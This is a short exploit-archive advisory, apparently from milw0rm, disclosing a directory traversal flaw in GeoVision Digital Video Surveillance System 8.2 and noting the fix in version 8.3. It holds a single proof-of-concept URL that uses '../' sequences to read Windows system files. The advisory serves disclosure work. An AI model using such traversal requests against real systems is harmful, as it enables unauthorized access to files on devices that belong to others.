GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure
| EKU-ID: 15874 | CVE: OSVDB-51886;CVE-2009-5087 | OSVDB-ID: |
| Author: Dejan Levaja | Published: 2009-02-11 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 15874 | CVE: OSVDB-51886;CVE-2009-5087 | OSVDB-ID: |
| Author: Dejan Levaja | Published: 2009-02-11 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Hi. There is a Directory traversal vulnerability in Geovision Digital Video Surveillance System (geohttpserver)version 8.2. POC: http://remotehost/../../../../../../windows/system32/whatever.something PATCH: Vendor has published the new version (8.3) Regards, Dejan Levaja NSS d.o.o. dejan[dot]levaja[at]netsec[dot]rs # milw0rm.com [2009-02-11]